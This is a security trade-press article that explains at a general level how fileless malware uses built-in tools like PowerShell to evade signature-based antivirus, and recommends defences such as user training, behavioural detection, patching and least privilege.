Fileless Attacks: Addressing Evolving Malware Threats

Even the most unskilled and inexperienced thieves stick to some basic principles – operate incognito and do not get caught. It might sound obvious, but it is the difference between success and failure for physical and cyber-criminals alike.

Just as a robber knows that it’s better to sneak into a shop via the backdoor than break down the street-facing frontage, cyber-criminals are finding more sophisticated and effective ways to stay under the radar and evade detection.

Enter fileless attacks.

Unlike traditional malware attacks, fileless malware does not require installing code on software or systems. Fileless payloads are instead used to infect computer memory, using pre-installed system tools to execute a ‘living off the land’ attack.

Let’s consider an example. A typical attack would see a user interacting with a URL on a malicious website or in a phishing email. If the link were to be clicked, the fileless malware would boot up a program such as Adobe Flash or Microsoft Word, in turn executing a script and invoking Powershell to download and execute the malicious activity of the payload within the computer memory.

So, what’s the key challenge here?

Fileless attacks aren’t necessarily more or less malicious than traditional malware attacks, and it’s not the degree of danger that’s the problem. The issue is that they can more easily bypass traditional antivirus solutions that are still commonplace in the market.

We’re often told how quickly technology is moving; that we’ll see more innovation in the coming 10 years than the previous 100, and cybercrime is no exception to this rule. It is forever evolving, and there is a growing knowledge gap regarding security best practice.

Countless organizations still rely heavily on signature-based antivirus software, but these solutions are often unable to detect fileless malware attacks. In no uncertain terms, they are outdated.

A Growing Problem of Intelligent Opportunists

Indeed, fileless attacks are an escalating problem. They increased by 265% year over year in 2019, which continued through 2020, and I expect this trend to continue in 2021.

Many threat actors are now repurposing their traditional malware to deliver it through more complex, multi-stage fileless attacks. Where it may have previously been detected by signature-based antivirus software using traditional methods, fileless techniques offer a second bite at the apple owing to their ability to bypass many detection solutions.

Recent attacks, such as TrickBot’s new ‘BazarBackdoor’ malware, are well cited, and you don’t have to look far to find them. The cloak of COVID-19 has provided a prime opportunity for hackers to play on people’s fears, and perpetrators have moved quickly to adapt their phishing hooks.

When the pandemic began to hit the news in January and February of 2020, we observed many phishing emails targeting Asian countries – things like ‘click here to see a video of Wuhan’ and those emails promising miracle remedy cures.

As the virus continued to spread, phishing emails targeting European countries emerged that were quickly adapted to begin delivering malware. For example, the AstraZeneca vaccine controversy dominating European news - is frequently used in European-targeted spear-phishing campaigns. These are perhaps the most convincing yet.

What’s the Solution?

It has never been more critical for organizations and individuals alike to protect themselves. More and more cyber-criminals are identifying opportunities, with lucrative rewards such as crypto-mining providing ever-greater incentives.

Unfortunately, organizations can use no magic bullet to mitigate the risks of fileless malware completely. That said, organizations can take numerous steps to achieve a better overall security posture.

The first is user awareness. With 95% of all cyber-attacks succeeding due to human error, phishing simulations should be used to both evaluate employee awareness and hit home just how easy it can be for fileless attacks to succeed.

Of course, awareness on its own is not enough. Human error won’t ever be eliminated entirely, and while one fileless phishing campaign might not trick one user, it could easily catch another out.

To reiterate, traditional signature-based antivirus solutions are outdated, but there are alternatives. Behavioral-based antivirus solutions now exist, while managed detection and response services help secure networks, endpoints and the cloud. Advanced email protection solutions may also be deployed to bolster overall security.

Regular patch cycles are also worth conducting, as outdated software and browser extensions can be leveraged for fileless malware attacks. Further, consider your overall security hygiene – are you using the principle of least privilege, only allowing employees enough access so that they may perform their required job?

Fileless malware has been around for 20 or more years, and it is not going away anytime soon.

We’ve already observed some attacks increasing in activity in 2021, such as CrySIS (aka Dharma) Ransomware, and are expecting to see crypto-mining attacks follow suit. Are you fully prepared against cyberattacks? If you have not addressed this vital question, the time to do so is now.

What’s Hot on Infosecurity Magazine?